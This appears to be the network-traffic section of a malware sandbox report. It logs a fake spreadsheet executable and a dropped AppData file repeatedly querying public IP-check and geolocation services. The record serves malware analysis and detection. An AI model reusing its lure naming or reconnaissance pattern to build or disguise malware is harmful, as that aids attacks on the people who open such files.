Oct 14, 2024 11:05:28.925517082 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 876de6b5eacaae27a6bf279bd26ce6d3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49728	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:28.970073938 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:29.562046051 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 21629e7761bbe410f6775eed2d081450 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49729	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:29.556751966 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:31.136333942 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f7a32d79dd5002cb054935939bc74474 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49731	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:30.195188046 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:30.799861908 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bbb5d4a2d701a7d6f5c8f6f292720989 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49735	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:31.438333988 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:33.014524937 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 557ef5a7ef772f27baf2287c27ed87dc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49736	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:31.763582945 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:32.350094080 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 404bac9ca1d3c23b79bc0035a4f19a37 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49742	158.101.44.242	80	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:32.988413095 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:33.573607922 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 439978a5dc9c17bc920df64fe0818c2c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49746	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:33.680917025 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:34.256505013 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: feeb59df95863d6926f8a759cecbc197 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49750	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:34.878664017 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:35.453589916 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 92698928b49020249f4c8c4b167c13fa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49752	158.101.44.242	80	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 11:05:36.189001083 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 14, 2024 11:05:36.814676046 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee94f4cc93e55d1a9f96e2220e31ce27 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:22 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:23 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30799 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TWZi5R085YCM7E%2BN8SpYXGGg9PsWndmFr%2Bi6DMCrbqva5j0P9r1v%2F9RMLN6af%2BJ9MV79w3o9fac84J48INlQfpshdWKXOKZjIF8eOnn6g%2F5RHu36K64ddKGg32t9cFGWDEU%2FvH5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266846efa17c88-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:23 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30799 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9O%2FSq1G6VtR9TXwOxEtRMObHkwdHWPdf6BJYlY2JeaORmfuJOcVTURM4O68jsMHK9qLItoYa2qY9JkJFpvvvMX8uw66BAoctI8atinZ1%2B1YVS2ei5OA2xfDRIGPd%2F8grex9MCdFk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26684bdf878c9c-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:24 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:25 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30801 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBHkjbDW18RGD4zuEzdfzuq4RJLxGegtbXLaD3ddb4zbgmVMOzfFmsQNTa5p5KmzfTd0NkD25aeIcvOD9%2FOaRbH8ny9ZdQflSrubfnRVizds%2BoYhGERQ93%2FBtrVchFq7c66ccncm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266853786c0cb8-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49719	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:25 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:26 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30802 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xoC2OmrylyrBiFVNuWjoJFBlAgi%2FKwtDgWcKPouXxQeUw96JarndHT1KTqQzMUd0mDsp%2BdyU0RsTuaZrSKaM209EyXcSsOgLGsR1Nk1eaBdSwQKP2%2FydAHL5%2BlKk6OyOnJ5%2FZhmb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266859a8bf41e3-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:26 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:26 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30802 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToD336agDYga0VXH1i59kUD4fo296bLeIlN9ZqNievVZQwAep0R8qslWMVUZd18tc7T0wUag4v%2F%2FM9PtJONImTcPIO%2BrMyRPonqnSfE9TFNu%2F7OjhCMr%2FnraCOL3HBHHZ5YaMN1P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26685b182a43d6-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:26 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:27 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30802 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qg62BzQwh0d7m%2BwRgjkGlsh7dTYORs1eKbFgh6dft8hrij4r%2F2PlGNqk6gG%2BpJnN4EkEWD%2FogA%2ByKaG1yw8B14j5paBVzQTletUGMfuxk8NIQNpy3TB7K%2FpXcvquTa7gK59RTVsH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26685e9dc3c3f0-EWR alt-svc: h3=":443"; ma=86400
